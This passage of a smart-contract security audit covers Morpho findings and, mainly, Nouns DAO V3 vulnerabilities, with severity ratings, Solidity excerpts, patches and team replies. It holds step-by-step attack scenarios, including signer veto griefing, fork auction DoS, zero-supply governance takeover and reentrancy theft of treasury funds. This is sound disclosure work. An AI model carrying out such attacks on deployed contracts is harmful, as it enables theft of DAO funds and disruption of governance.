+5.5.25 The onBehalf argument can be set to the Morpho protocol's address Severity: Informational Context: aave-v2/EntryPositionsManager.sol#L93, compound/PositionsManager.sol#L236 Description: When calling the supplyLogic function, the _onBehalf argument currently allows a user to supply funds on behalf of the Morpho protocol itself. While this does not seem exploitable, it can still be a cause of user error and should not be allowed. Recommendation: The supplyLogic function should revert if the _onBehalf argument is the Morpho protocol's own address. Morpho: We did not find any potential issue for this case, thus we acknowledge the issue. Spearbit: Acknowledged.
+5.5.26 maxSortedUsers has no upper-bounds validation and is not the same in Compound/Aave-v2 Severity: Informational Context: compound/MorphoGovernance.sol#L170, aave-v2/MorphoGovernance.sol Description: In MorphoGovernance.sol, the maxSortedUsers setter has no upper-bounds limit in place. maxSortedUsers is the number of users to sort in the data structure. Also, while this function has the MaxSortedUsersCannotBeZero() check in Aave-v2, the Compound version is missing this same error check. Recommendation: Consider setting an upper-bounds limit on the maxSortedUsers number so as not to run into gas issues when sorting user data in the data structure. Also, the MaxSortedUsersCannotBeZero() check should be added to the Compound version of this function as well, for code consistency. Morpho: We acknowledge the issue but will not implement the recommendation. Spearbit: Acknowledged.
+5.5.27 Consider adding the Compound revert error code inside Morpho's custom error to better track the revert reason Severity: Informational Context: MorphoGovernance.sol#L443, PositionsManager.sol#L927, PositionsManager.sol#L937, PositionsManager.sol#L945, PositionsManager.sol#L970 Description: On Compound, when an error condition occurs, usually (except in extreme cases) the transaction is not reverted, and instead an error code (code != 0) is returned. Morpho correctly reverts with a custom error when this happens, but it does not report the error code returned by Compound. By tracking the error code as a parameter of the custom error, Morpho could better monitor when and why interactions with Compound are failing. Recommendation: Consider adding the error code returned by Compound to Morpho's custom errors. Morpho: Fixed in PR 1550. Spearbit: Fixed.
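A minimal sketch of the recommendation above (the custom error name is hypothetical; Compound cToken calls such as mint return a uint256 error code where 0 means success):

error MintOnCompoundFailed(uint256 errorCode); // hypothetical custom error

uint256 errorCode = ICToken(_poolToken).mint(_amount);
// Bubble Compound's error code up instead of a bare custom error,
// so monitoring can tell *why* the interaction failed.
if (errorCode != 0) revert MintOnCompoundFailed(errorCode);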
+5.5.28 The liquidationThreshold variable name can be misleading Severity: Informational Context: aave-v2/ExitPositionsManager.sol#L678 Description: The liquidationThreshold name in Aave is a percentage. The values.liquidationThreshold variable used in Morpho's _getUserHealthFactor is in "value units", like debt: values.liquidationThreshold = assetCollateralValue.percentMul(assetData.liquidationThreshold);. Recommendation: Consider renaming the variable to avoid confusion, for example liquidationThresholdValue. Morpho: Fixed in PR 1547 and PR 1559. Spearbit: Verified.
+5.5.29 Users can be liquidated on Morpho at any time when the deprecation flag is set by governance Severity: Informational Context: aave-v2/MorphoGovernance.sol#L395, compound/MorphoGovernance.sol#L372, aave-v2/ExitPositionsManager.sol#L706 Description: Governance can set a deprecation flag on Compound and Aave markets, and users on this market can be liquidated by anyone even if they are sufficiently over-collateralized. Note that this deprecation flag is independent of Compound's own deprecation flags and can be applied to any market. Recommendation: Users should be aware of this. Clearly communicate when you deprecate a market and give users enough time to unwind their positions on the markets to be deprecated. Morpho: No changes have been made in the code, but users will be warned in any case, since it requires governance approval to do so. Spearbit: Acknowledged.
+5.5.30 Refactor _computeP2PIndexes to use the InterestRatesModel's functions Severity: Informational Context: aave-v2/InterestRatesManager.sol#L113, compound/InterestRatesManager.sol#L100, aave-v2/InterestRatesModel.sol#L49 Description: The InterestRatesManager contracts' _computeP2PIndexes functions currently reimplement the interest rate model from the InterestRatesModel functions. Recommendation: Consider refactoring InterestRatesManager._computeP2PIndexes to use InterestRatesModel functions like computeGrowthFactors, computeP2PSupplyIndex, and computeP2PBorrowIndex. This would also guarantee that the lens contracts indeed use the same model that the contract uses, as they use the mentioned InterestRatesModel functions. Morpho: Fixed in PR 1537. Spearbit: Verified.
diff --git a/findings_newupdate/spearbit/Nouns-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/Nouns-Spearbit-Security-Review.txt new file mode 100644 index 0000000..6045472 --- /dev/null +++ b/findings_newupdate/spearbit/Nouns-Spearbit-Security-Review.txt @@ -0,0 +1,67 @@
+5.1.1 Any signer can cancel a pending/active proposal to grief the proposal process Severity: High Risk Context: NounsDAOV3Proposals.sol#L560-L589, NounsDAOV3Proposals.sol#L813-L821 Description: Any proposal signer, besides the proposer, can cancel the proposal later, irrespective of the number of votes they contributed earlier towards the threshold. The signer could even have zero votes, because getPriorVotes(signer, ..) is not checked for a non-zero value in verifySignersCanBackThisProposalAndCountTheirVotes() as part of the proposeBySigs() flow.
This seems to be a limitation of the design described in hackmd.io/@el4d/nouns-dao-v3-spec#Cancel. With the signature-based scheme, every signer is as powerful as the proposer. As long as their combined votes meet the threshold, it does not matter who contributed how much to the voting power. And assuming everyone contributed some non-zero power, they are all given the cancellation capability. However, for example, a signer/proposer with 0 voting power is treated on par with any other signer who contributed 10 Nouns towards meeting the proposal threshold. A malicious signer can sign off on every valid proposal to later cancel it. The vulnerability arises from a lack of a voting power check on the signer and the cancel capability given to any signer. Example scenario: Evil, without having to own a single Noun, creates a valid signature to back every signature-based proposal from a different account (to bypass checkNoActiveProp()) and gets it included in the proposal creation process via proposeBySigs(). Evil then cancels every such proposal at will, i.e. no signature-based proposal that Evil manages to get included into, potentially all of them, will ever get executed. Impact: This allows a malicious griefing signer, who could really be anyone without having to own any Nouns but who manages to get their signature included in proposeBySigs(), to cancel that proposal later. This effectively gives anyone a veto power on all signature-based proposals. High likelihood + Medium impact = High severity.
• Likelihood is High because anyone with no special ownership (of Nouns) or special roles in the protocol frontend could initiate a signature to be accepted by the proposer. We assume no other checks are made (e.g. by the frontend) because those are out of scope, not specified/documented, depend on the implementation, depend on their trust/threat models, or may be bypassed by protocol actors interacting directly with the contracts. We cannot be sure of how the proposer decides which signatures to include and what checks are actually made, because that is done offchain. Without that information, we are assuming that the proposer includes all signatures they receive.
• Impact is Medium because, with the Likelihood rationale, anyone can get their signature included to later cancel a signature-backed proposal, which in the worst case (again, without additional checks/logic) gives anyone a veto power on all signature-based proposals, potentially bringing governance to a standstill if signatures are expected to be the dominant approach going forward. Even if we assume that a proposer learns to exclude a zero-vote cancelling signer (with external checks) after experiencing this griefing, the signer can move on to other unsuspecting proposers. Given that this is one of the key features of the V3 UX, we reason this permissionless griefing DoS on governance to be at Medium impact.
While the cancellation capability is indeed specified as the intended design, we reason that this is a risky feature for the reasons explained above. This should ideally be determined based only on the contributing voting power, as suggested in our recommendation. Filtering out signers with zero voting power raises the bar from the current situation by requiring signers to have non-zero voting power (i.e. the cost of the griefing attack becomes non-zero) but will not prevent signers from transferring their voting-power-granting Noun(s) to other addresses, getting new valid signatures included on other signature-based proposals, and griefing them later by cancelling. Equating a non-zero voting power to a veto power on all signature-based proposals in the protocol continues to be very risky. Recommendation: Consider the following mitigative redesign (as a suggestive example, i.e. there could be others) to allow cancellations only based on cumulative voting power:
Equating a non-zero voting power to a veto power on all signature-based proposals in the protocol continues to be very risky.
Recommendation: Consider the following mitigative redesign (as a suggestive example, i.e. there could be others) to allow cancellations only based on cumulative voting power:
1. Remove the special consideration for the proposer in the signature-based flow in verifySignersCanBackThisProposalAndCountTheirVotes() and other related logic, to instead make them include their signature along with the other signers.
2. Remove the msgSenderIsProposer logic in cancel() to allow cancellations only if the cumulative votes of signers is less than proposal.proposalThreshold.
3. Add cancelledSigs-like logic to the cumulative voting power calculation of cancel(), so that signers can rely on it to remove their support even beyond the proposal creation state.
4. Allow anyone to permissionlessly (i.e. they don't have to be the proposer or a signer) call cancel(), which calculates the cumulative voting power of the proposal while accounting for the cancelledSigs-like logic from all signers (even the proposer, who is also a signatory like the other signers) and cancels the proposal transactions if the cumulative voting power is below proposalThreshold.
The scale of the proposed modifications isn't too substantial; the base recommendation can be written as follows (skipping step (1) above to limit the changes and to remain in line with the V1 and V2 logic):
• NounsDAOV3Proposals.sol#L560-L587

      function cancel(NounsDAOStorageV3.StorageV3 storage ds, uint256 proposalId) external {
          ...
          NounsDAOStorageV3.Proposal storage proposal = ds._proposals[proposalId];
          address proposer = proposal.proposer;
          NounsTokenLike nouns = ds.nouns;

          uint256 votes = nouns.getPriorVotes(proposer, block.number - 1);
-         bool msgSenderIsProposer = proposer == msg.sender;
          address[] memory signers = proposal.signers;
          for (uint256 i = 0; i < signers.length; ++i) {
-             msgSenderIsProposer = msgSenderIsProposer || msg.sender == signers[i];
-             votes += nouns.getPriorVotes(signers[i], block.number - 1);
+             if (!ds.cancelledSigProposals[signers[i]][proposalId])
+                 votes += nouns.getPriorVotes(signers[i], block.number - 1);
          }
          require(
-             msgSenderIsProposer || votes <= proposal.proposalThreshold,
+             proposer == msg.sender || votes <= proposal.proposalThreshold,
              'NounsDAO::cancel: proposer above threshold'
          );

• NounsDAOInterfaces.sol#L684-L685

          /// @notice user => sig => isCancelled: signatures that have been cancelled by the signer and are no longer valid
          mapping(address => mapping(bytes32 => bool)) cancelledSigs;
+         /// @notice user => proposalId => isCancelled: proposals for which signers have cancelled their signatures
+         mapping(address => mapping(uint256 => bool)) cancelledSigProposals;

• NounsDAOV3Proposals.sol#L262-L267

-     function cancelSig(NounsDAOStorageV3.StorageV3 storage ds, bytes calldata sig) external {
+     function cancelSig(NounsDAOStorageV3.StorageV3 storage ds, bytes calldata sig, uint256 proposalId) external {
          bytes32 sigHash = keccak256(sig);
          ds.cancelledSigs[msg.sender][sigHash] = true;
+         if (proposalId > 0) {
+             ds.cancelledSigProposals[msg.sender][proposalId] = true;
+         }
          emit SignatureCancelled(msg.sender, sig);
      }

Nouns: Signers being able to cancel a proposal they signed is a conscious design choice. We plan to filter out signers that have voting power of zero in proposeBySigs. We implemented a fix here: PR 713, but still think the severity should be lowered.
Likelihood: low. Only the proposer of a proposal can call proposeBySigs; therefore a malicious signer can't include the signature by front-running, for example. In addition, the frontend will filter out signers that have no voting power, as well as notify the user that any signer included will have the power to cancel the proposal. Therefore, we think the likelihood that a user would add a signer with no voting power is low.
Impact: low. Even if for some reason, perhaps confusion, a user adds a signer with zero votes and their proposal gets cancelled, they can propose again and are unlikely to make the same mistake again.
For the reasons we shared earlier: won't fix.
Spearbit: The proposed fix PR 713 checks for signer votes and skips inclusion/consideration if their votes are zero. It also reverts if the number of non-zero signers is zero. The fix for the described surface and our recommendation would be to remove the ability of a signer to cancel unconditionally. Simultaneously, in order to keep the relevant degree of renouncing power in the hands of signers, cancelledSigs-like mechanics can be added to the cancel() logic. Currently cancelSig() has no implications for cancel(), which doesn't look like consistent behavior: whenever a signer runs cancelSig() they would not expect that it is not enough and that cancel() also needs to be run, because otherwise the signature de facto continues to be used as fully valid. At the same time, the ability of any signer to cancel unconditionally appears to be excessive. Why is the cancellation justified when there are enough votes to pass the proposal threshold even without this signature? We see a griefing surface here and not too much value added. Therefore, we are not convinced that the proposed fix mitigates the described risk completely.

+5.1.2 Potential Denial of Service (DoS) attack on NounsAuctionHouseFork Contract
Severity: High Risk
Context: NounsAuctionHouseFork.sol#L213
Description: The potential vulnerability arises during the initialization of the NounsAuctionHouseFork contract, which is deployed and initialized via the executeFork() function when a new fork is created. At this stage, the state variable startNounId within the NounsTokenFork contract is set corresponding to the nounId currently being auctioned in the NounsAuctionHouse. It should be noted that the NounsAuctionHouseFork contract is initially in a paused state and requires a successful proposal to unpause it, thus enabling the minting of new Nouns tokens within the fork. Based on the current structure, an attacker can execute a DoS attack through the following steps:
1. Assume the executeFork() threshold is 7 Nouns and the attacker owns 8 Nouns. The current nounId being auctioned is 735.
2. The attacker places the highest bid for nounId 735 in the NounsAuctionHouse contract and waits for the auction's conclusion.
3. Once the auction concludes, the attacker calls escrowToFork() with his 8 Nouns, triggering the executeFork() threshold.
4. Upon invoking executeFork(), new fork contracts are deployed. Below is the state of both the NounsAuctionHouseFork and NounsAuctionHouse contracts at this juncture:

      NounsAuctionHouseFork state:
          nounId -> 0
          amount -> 0
          startTime -> 0
          endTime -> 0
          bidder -> 0x0000000000000000000000000000000000000000
          settled -> false

      NounsAuctionHouse state:
          nounId -> 735
          amount -> 50000000000000000000
          startTime -> 1686014675
          endTime -> 1686101075
          bidder -> 0xE6b3367318C5e11a6eED3Cd0D850eC06A02E9b90 (attacker's address)
          settled -> false
5. The attacker executes settleCurrentAndCreateNewAuction() on the NounsAuctionHouse contract, thereby acquiring nounId 735.
6. Following this, the attacker invokes joinFork() on the main DAO and joins the fork with nounId 735. This action effectively mints nounId 735 within the fork and subsequently triggers a DoS state in the NounsAuctionHouseFork contract.
7. At a later time, a proposal is successfully passed and the unpause() function is called on the NounsAuctionHouseFork contract.
8. A revert occurs when the _createAuction() function tries to mint tokenId 735 in the fork (which was already minted during the joinFork() call), thus re-pausing the contract.
More broadly, this could happen if the buyer of the fork DAO's startNounId (and successive ones) on the original DAO (i.e. the first Nouns that get auctioned after a fork is executed) joins the fork with those tokens, even without any malicious intent, before the fork's auction is unpaused by its governance. The delayed governance applied to the fork DAO makes this timing-based behavior even more feasible: one only has to buy one or more of the original DAO tokens auctioned after the fork was executed and use them to join the fork immediately.
The NounsAuctionHouseFork contract gets into a DoS state, necessitating a contract update to the NounsTokenFork contract to manually increase the _currentNounId state variable to restore the normal flow in the NounsAuctionHouseFork. High likelihood + Medium impact = High severity.
Likelihood: High, because it is a very likely scenario, even unintentionally; it can be triggered by a non-malicious user who just wants to join the fork with a freshly bought Noun from the auction house.
Impact: Medium, because forking is bricked for at least several weeks until the upgrade proposal passes and is in place. This is not simply having a contract disabled for a period of time; it can be considered a loss of assets for the forked DAO as well, e.g. imagine that the forked DAO needs funding immediately. On top of this, the contract upgrade would have to be done on the NounsTokenFork contract to correct the _currentNounId state variable to a valid value and fix the denial of service in the NounsAuctionHouseFork. Would the fork joiners be willing to perform such a risky update on such a critical contract?
Recommendation: Consider one of the below options:
1. Update NounsTokenFork._currentNounId in claimDuringForkPeriod() if tokenIds[i] >= _currentNounId, so that fork auctions begin on Nouns that have not been auctioned (and migrated+minted on this fork) on the original DAO yet (sketched below).
2. Store the initial nounId that is being auctioned when the executeFork() function is invoked, and then prevent any subsequent calls to the joinFork() function with a nounId that is equal to or higher than that value. This will ensure that the _createAuction() function does not attempt to mint an already minted tokenId, thus preventing the contract from getting into a DoS state. However, note that MAX_FORK_PERIOD is 14 days, which means that, depending on the duration of delayed governance and the status of unclaimed escrow tokens, this could prevent up to 14 auctioned Nouns in the worst case from joining the fork.
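For illustration, a minimal sketch of option (1); this is hypothetical, simplified code following the names quoted in this report, not the actual change from PR 714:

      function claimDuringForkPeriod(address to, uint256[] calldata tokenIds) external {
          if (msg.sender != escrow.dao()) revert OnlyOriginalDAO();
          if (block.timestamp > forkingPeriodEndTimestamp) revert OnlyDuringForkingPeriod();
          for (uint256 i = 0; i < tokenIds.length; i++) {
              uint256 nounId = tokenIds[i];
              // Keep the auction counter ahead of every id minted via joinFork(), so that
              // _createAuction() never attempts to mint an id that already exists.
              if (nounId >= _currentNounId) _currentNounId = nounId + 1;
              _mintWithOriginalSeed(to, nounId);
          }
      }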
Nouns: Mitigation PR here: PR 714.
Spearbit: Verified that PR 714 fixes the issue using the first recommendation.

5.2 Medium Risk

+5.2.1 Total supply can drop to zero after the fork, allowing any subsequent joiner to execute exploiting proposals
Severity: Medium Risk
Context: NounsDAOLogicV1Fork.sol#L242-L305
Description: Total supply can drop all the way to zero during the forking period, so any holder then entering the forked DAO with joinFork() can push manipulating proposals and force all the later joiners either to rage quit or to be exploited.
As an example, suppose there is a group of Nouns holders that performed the fork for purely financial reasons, claimed all forked Nouns and quit. Right after that, block.timestamp < forkingPeriodEndTimestamp, so isForkPeriodActive(ds) == true in the original DAO contract. At the same time the forked token's adjustedTotalSupply is zero (all new tokens were sent to the timelock):
• NounsDAOLogicV1Fork.sol#L201-L208

      function quit(uint256[] calldata tokenIds) external nonReentrant {
          ...
          for (uint256 i = 0; i < tokenIds.length; i++) {
  >>          nouns.transferFrom(msg.sender, address(timelock), tokenIds[i]);
          }

• NounsDAOLogicV1Fork.sol#L742-L744

      function adjustedTotalSupply() public view returns (uint256) {
          return nouns.totalSupply() - nouns.balanceOf(address(timelock));
      }

Also, NounsTokenFork.remainingTokensToClaim() == 0, so the checkGovernanceActive() check does not revert in the forked DAO contract:
• NounsDAOLogicV1Fork.sol#L346-L349

      function checkGovernanceActive() internal view {
          if (block.timestamp < delayedGovernanceExpirationTimestamp && nouns.remainingTokensToClaim() > 0)
              revert WaitingForTokensToClaimOrExpiration();
      }

Original DAO holders can enter the new DAO only via joinFork(), which will keep checkGovernanceActive() non-reverting in the forked DAO contract:
• NounsDAOV3Fork.sol#L139-L158

      function joinFork(
          NounsDAOStorageV3.StorageV3 storage ds,
          uint256[] calldata tokenIds,
          uint256[] calldata proposalIds,
          string calldata reason
      ) external {
          ...
          for (uint256 i = 0; i < tokenIds.length; i++) {
              ds.nouns.transferFrom(msg.sender, timelock, tokenIds[i]);
          }
  >>      NounsTokenFork(ds.forkDAOToken).claimDuringForkPeriod(msg.sender, tokenIds);
          emit JoinFork(forkEscrow.forkId() - 1, msg.sender, tokenIds, proposalIds, reason);
      }

remainingTokensToClaim stays zero, as claimDuringForkPeriod() doesn't affect it:
• NounsTokenFork.sol#L166-L174

      function claimDuringForkPeriod(address to, uint256[] calldata tokenIds) external {
          if (msg.sender != escrow.dao()) revert OnlyOriginalDAO();
          if (block.timestamp > forkingPeriodEndTimestamp) revert OnlyDuringForkingPeriod();
          for (uint256 i = 0; i < tokenIds.length; i++) {
              uint256 nounId = tokenIds[i];
              _mintWithOriginalSeed(to, nounId);
          }
      }

In this situation both the quorum and proposal thresholds will be zero, and proposals can be created with creationBlock = block.number, at which only the recently joined holder has voting power:
• NounsDAOLogicV1Fork.sol#L242-L305

      function propose(
          address[] memory targets,
          uint256[] memory values,
          string[] memory signatures,
          bytes[] memory calldatas,
          string memory description
      ) public returns (uint256) {
          checkGovernanceActive();
          ProposalTemp memory temp;
          temp.totalSupply = adjustedTotalSupply();
  >>      temp.proposalThreshold = bps2Uint(proposalThresholdBPS, temp.totalSupply);
          require(
              nouns.getPriorVotes(msg.sender, block.number - 1) > temp.proposalThreshold,
              'NounsDAO::propose: proposer votes below proposal threshold'
          );
          ...
  >>      newProposal.proposalThreshold = temp.proposalThreshold;
  >>      newProposal.quorumVotes = bps2Uint(quorumVotesBPS, temp.totalSupply);
          ...
  >>      newProposal.creationBlock = block.number;

• DeployDAOV3NewContractsBase.s.sol#L18-L23

      contract DeployDAOV3NewContractsBase is Script {
          ...
          uint256 public constant FORK_DAO_PROPOSAL_THRESHOLD_BPS = 25; // 0.25%
          uint256 public constant FORK_DAO_QUORUM_VOTES_BPS = 1000; // 10%

This will give the first joiner full power over all the later joiners:
• NounsDAOLogicV1Fork.sol#L577-L589

      function castVoteInternal(
          address voter,
          uint256 proposalId,
          uint8 support
      ) internal returns (uint96) {
          ...
          /// @notice: Unlike GovernerBravo, votes are considered from the block the proposal was created in order to normalize quorumVotes and proposalThreshold metrics
  >>      uint96 votes = nouns.getPriorVotes(voter, proposal.creationBlock);

Say Bob, an original Nouns DAO holder with 1 Noun, joined when total supply was zero. He can create proposals, and for these proposals his single vote will be 100% of the DAO voting power. Bob can create a proposal to transfer all the funds to himself, or a hidden malicious one like the one shown in step 6 of "Fork escrowers can exploit the fork or force late joiners to quit". All the later joiners will not be able to stop this proposal, no matter how big their voting power is, as votes will be counted as of the block where Bob had 100% of the votes.
As the scenario above is a part of the expected workflow (i.e. all fork initiators can reasonably be expected to quit fast enough), its probability is medium, while the probability of inattentive late joiners being exploited by Bob's proposal is medium too (there is not much time to react, and some holders might first of all want to explore the new fork's functionality), so the overall probability is low, while the impact is a full loss of funds for such joiners. Per low combined likelihood and high impact, setting the severity to medium.
Recommendation: In order to achieve stability, the forked DAO needs to secure enough members first; so, as one of the options, the fork period might be required to conclude before any proposals can be made in the new DAO. To this end, consider additionally passing the forkingPeriodEndTimestamp to the forked DAO (it is currently only passed to the forked token), and forbidding new proposals until forkingPeriodEndTimestamp, for example:
• NounsDAOStorageV1Fork.sol#L51-L54

      /// @notice The latest proposal for each proposer
      mapping(address => uint256) public latestProposalIds;
      uint256 public delayedGovernanceExpirationTimestamp;
+     /// @notice The forking period expiration timestamp, after which new tokens cannot be claimed by the original DAO
+     uint256 public forkingPeriodEndTimestamp;

• NounsDAOLogicV1Fork.sol#L164-L193

      function initialize(
          address timelock_,
          address nouns_,
          uint256 votingPeriod_,
          uint256 votingDelay_,
          uint256 proposalThresholdBPS_,
          uint256 quorumVotesBPS_,
          address[] memory erc20TokensToIncludeInQuit_,
          uint256 delayedGovernanceExpirationTimestamp_,
+         uint256 forkingPeriodEndTimestamp_
      ) public virtual {
          __ReentrancyGuard_init_unchained();
          ...
          delayedGovernanceExpirationTimestamp = delayedGovernanceExpirationTimestamp_;
+         forkingPeriodEndTimestamp = forkingPeriodEndTimestamp_;
      }

• NounsDAOLogicV1Fork.sol#L107

      error WaitingForTokensToClaimOrExpiration();
+     error WaitingForForkPeriodEnd();

• NounsDAOLogicV1Fork.sol#L242-L249

      function propose(
          address[] memory targets,
          uint256[] memory values,
          string[] memory signatures,
          bytes[] memory calldatas,
          string memory description
      ) public returns (uint256) {
          checkGovernanceActive();
+         if (block.timestamp <= forkingPeriodEndTimestamp) {
+             revert WaitingForForkPeriodEnd();
+         }

Nouns: Fix implementation: nounsDAO/nouns-monorepo#717.
Spearbit: The fix looks good.

+5.2.2 Duplicate ERC20 tokens will send a greater than pro rata token share, leading to loss of DAO funds
Severity: Medium Risk
Context: NounsDAOV3Admin.sol#L497-L507, NounsDAOV3Fork.sol#L224-L230, NounsDAOLogicV1Fork.sol#L717-L721, NounsDAOLogicV1Fork.sol#L210-L215
Description: _setErc20TokensToIncludeInFork() is an admin function for setting the ERC20 tokens that are used when splitting funds to a fork. However, there are no sanity checks for duplicate ERC20 tokens in the erc20tokens parameter. While stETH is the only ERC20 token applicable for now, it is conceivable that the DAO treasury may include others in future. The same argument applies to _setErc20TokensToIncludeInQuit() and members quitting from the fork DAO. Duplicate tokens in the array will send a greater than pro rata share of those tokens to the fork DAO treasury in sendProRataTreasury(), or to the quitting member in quit(). This will lead to loss of funds for the original DAO and fork DAO respectively. Low likelihood + High impact = Medium severity.
Recommendation: Consider adding a check to filter out any duplicates in the setters or in sendProRataTreasury()/quit().
Nouns: Fix PR: PR 733.
Spearbit: Verified that PR 733 fixes this issue as recommended, using checks in the setters.
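For illustration, a minimal sketch of a duplicate check in one of the setters; this is hypothetical, simplified code (the storage field name is assumed), not the actual change from PR 733:

      function _setErc20TokensToIncludeInFork(NounsDAOStorageV3.StorageV3 storage ds, address[] calldata erc20tokens) external onlyAdmin(ds) {
          // Reject duplicate addresses before persisting the list;
          // O(n^2) is acceptable for a short admin-set list.
          for (uint256 i = 0; i < erc20tokens.length; i++) {
              for (uint256 j = i + 1; j < erc20tokens.length; j++) {
                  require(erc20tokens[i] != erc20tokens[j], 'duplicate token');
              }
          }
          ds.erc20TokensToIncludeInFork = erc20tokens; // assumed storage field
          ...
      }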
+5.2.3 A malicious proposer can create an arbitrary number of maliciously updatable proposals to significantly grief the protocol
Severity: Medium Risk
Context: NounsDAOV3Proposals.sol#L783-L798, NounsDAOV3Proposals.sol#L171, NounsDAOV3Proposals.sol#L818-L823, NounsDAOV3Proposals.sol#L269-L423
Description: checkNoActiveProp() is documented as: "This is a spam protection mechanism to limit the number of proposals each noun can back." However, this mitigation applies to proposer addresses holding Nouns, but not to the Nouns themselves, because checkNoActiveProp() relies on checking the state of proposals tracked by proposer via latestProposalId = ds.latestProposalIds[proposer]. A malicious proposer can move (transfer/delegate) their Noun(s) to different addresses to circumvent this mitigation and create proposals from those new addresses to spam. Furthermore, proposal updates in the protocol do not check that the proposer meets any voting power threshold at the time of the update. A malicious proposer can create an arbitrary number of proposals, each from a different address by transferring/delegating their Nouns, and then update any/all of them to be malicious. Substantial effort will be required to differentiate all such proposals from the authentic ones and then cancel them, leading to DAO governance DoS griefing. Medium likelihood + Medium impact = Medium severity.
Recommendation: Consider:
1. A redesign where proposal creation spam mitigation is not based on the Noun-controlling address but on the Noun itself.
2. Adding a proposal threshold check for voting power during updates.
Nouns: Won't Fix. This is a known issue from the launch of Nouns, and is mitigated by canceling proposals once the proposer doesn't have enough balance to meet the threshold, as well as by the vetoer in extreme cases. Such spammy behavior should easily become suspicious, and token holders will be ready to cancel all such proposals, same as they are today. Specifically, when it comes to obvious spamming, we don't think updatable proposals add any meaningful risk. The spammy behavior is the main red flag, and using this new feature with more stealth is already discussed in "A malicious proposer can update proposal past inattentive voters to sneak in otherwise unacceptable details".
Spearbit: Acknowledged.

+5.2.4 A malicious proposer can update proposal past inattentive voters to sneak in otherwise unacceptable details
Severity: Medium Risk
Context: NounsDAOV3Proposals.sol#L269-L423, NounsDAOV3Admin.sol#L118, NounsDAOV3Votes.sol#L70-L293
Description: An updatable proposal description and transactions is a new feature being introduced in V3 to improve the UX of the proposal flow by allowing proposal editing on-chain. The motivation for this feature as described in the spec is: "Proposals get voter feedback almost entirely only once they are on-chain. At the same time, proposers are reluctant to cancel and resubmit their proposals for multiple reasons, e.g. preferring to avoid restarting the proposal lifecycle and thus delay funding."
However, votes are bound only to the proposal identifier and not to its description (which describes the motivation/intention/usage etc.) or its transactions (values transferred, contracts/functions of interaction etc.). Inattentive voters may (decide to) cast their votes based on a stale proposal's description/transactions, which could since have been updated. For example, someone voting Yes on the initial proposal version may vote No if they see the updated details. A very small voting delay (MIN_VOTING_DELAY is 1 block) may even allow a malicious proposer to sneak in a malicious update at the very end of the updatable period so that voters do not see it in time to change the votes being cast. Delays in front-ends updating the proposal details may contribute to this scenario. A malicious proposer updates the proposal with otherwise unacceptable txs/description to get the support of inattentive voters who cast their votes based on acceptable older proposal versions. The malicious proposal passes, transferring a significant amount of treasury to unauthorized receivers for unacceptable reasons. Low likelihood + High impact = Medium severity.
Recommendation: Increase the minimum threshold for the voting delay to a reasonable value much greater than the current 1 block (12 seconds), e.g. a few days, which always (i.e. even assuming that the DAO can change the voting delay to any allowed value) gives voters sufficient time to notice/evaluate updated proposal details after the updatable period ends and the voting period is active. A more defensive design is to make the votes binding on the proposal description+transactions instead of only the proposal identifier (sketched below).
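For illustration, a hedged sketch of how votes could be bound to the proposal content rather than only its id; this is hypothetical code, with the names castVoteWithContentHash and contentHash invented for the sketch:

      // The voter supplies the hash of the proposal version they actually reviewed.
      function castVoteWithContentHash(NounsDAOStorageV3.StorageV3 storage ds, uint256 proposalId, uint8 support, bytes32 contentHash) internal {
          NounsDAOStorageV3.Proposal storage proposal = ds._proposals[proposalId];
          // proposal.contentHash would be refreshed on every proposal update, e.g. as
          // keccak256(abi.encode(targets, values, signatures, calldatas, keccak256(bytes(description)))).
          require(contentHash == proposal.contentHash, 'vote cast against a stale proposal version');
          ...
      }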
Nouns: Won't Fix. We think it highly unlikely the DAO will set the voting delay to be very short. The DAO enjoys a multi-day period it uses to make sense of proposals.
Spearbit: Acknowledged.

+5.2.5 NounsDAOLogicV1Fork's quit() performing external calls in-between total supply and balance reads can allow for treasury fund stealing via cross-contract reentrancy
Severity: Medium Risk
Context: NounsDAOLogicV1Fork.sol#L201-L222
Description: Let's suppose there is an initiative group of Nouns holders that performed the fork, claimed, and immediately quit (say for purely financial reasons). Right after that, block.timestamp < forkingPeriodEndTimestamp, so isForkPeriodActive(ds) == true in the original DAO contract, while NounsTokenFork.remainingTokensToClaim() == 0, so checkGovernanceActive() doesn't revert in the forked DAO contract, which has no material holdings.
For simplicity, let's say there are Bob and Alice; both aren't part of this group and are still in the original DAO. Bob has 2 Nouns, Alice has 1, each Noun's share of the treasury is 1 stETH and 100 ETH, and erc20TokensToIncludeInQuit = [stETH].
All the above are going-concern assumptions (a part of the expected workflow); let's now add a low-probability one: the stETH contract was upgraded and now performs a _beforetokentransfer() callback on every transfer to a destination address as long as it's a contract (i.e. it has a callback; for simplicity let's assume it behaves similarly to ERC-721 safeTransfer). This doesn't make it malicious or break IERC20; let's just suppose there is a strong enough technical reason for such an upgrade.
If Alice now decides to join this fork, Bob can steal from her:
1. Alice calls NounsDAOV3's joinFork(); 1 stETH and 100 ETH are transferred to NounsDAOLogicV1Fork:
• NounsDAOV3Fork.sol#L139-L158

      function joinFork(
          NounsDAOStorageV3.StorageV3 storage ds,
          uint256[] calldata tokenIds,
          uint256[] calldata proposalIds,
          string calldata reason
      ) external {
          if (!isForkPeriodActive(ds)) revert ForkPeriodNotActive();
          INounsDAOForkEscrow forkEscrow = ds.forkEscrow;
          address timelock = address(ds.timelock);
          sendProRataTreasury(ds, ds.forkDAOTreasury, tokenIds.length, adjustedTotalSupply(ds));
          for (uint256 i = 0; i < tokenIds.length; i++) {
              ds.nouns.transferFrom(msg.sender, timelock, tokenIds[i]);
          }
          NounsTokenFork(ds.forkDAOToken).claimDuringForkPeriod(msg.sender, tokenIds);
          emit JoinFork(forkEscrow.forkId() - 1, msg.sender, tokenIds, proposalIds, reason);
      }

Alice is minted 1 forked Noun:
• NounsTokenFork.sol#L166-L174

      function claimDuringForkPeriod(address to, uint256[] calldata tokenIds) external {
          if (msg.sender != escrow.dao()) revert OnlyOriginalDAO();
          if (block.timestamp > forkingPeriodEndTimestamp) revert OnlyDuringForkingPeriod();
          for (uint256 i = 0; i < tokenIds.length; i++) {
              uint256 nounId = tokenIds[i];
              _mintWithOriginalSeed(to, nounId);
          }
      }

2. Bob transfers everything to an attack contract (cBob), which joins the DAO with 1 Noun. The forked treasury is 2 stETH and 200 ETH; cBob and Alice both have 1 Noun.
3. cBob calls quit() and re-enters NounsDAOV3's joinFork() on the stETH _beforetokentransfer() (and nothing else):
• NounsDAOLogicV1Fork.sol#L201-L222

      function quit(uint256[] calldata tokenIds) external nonReentrant {
          checkGovernanceActive();
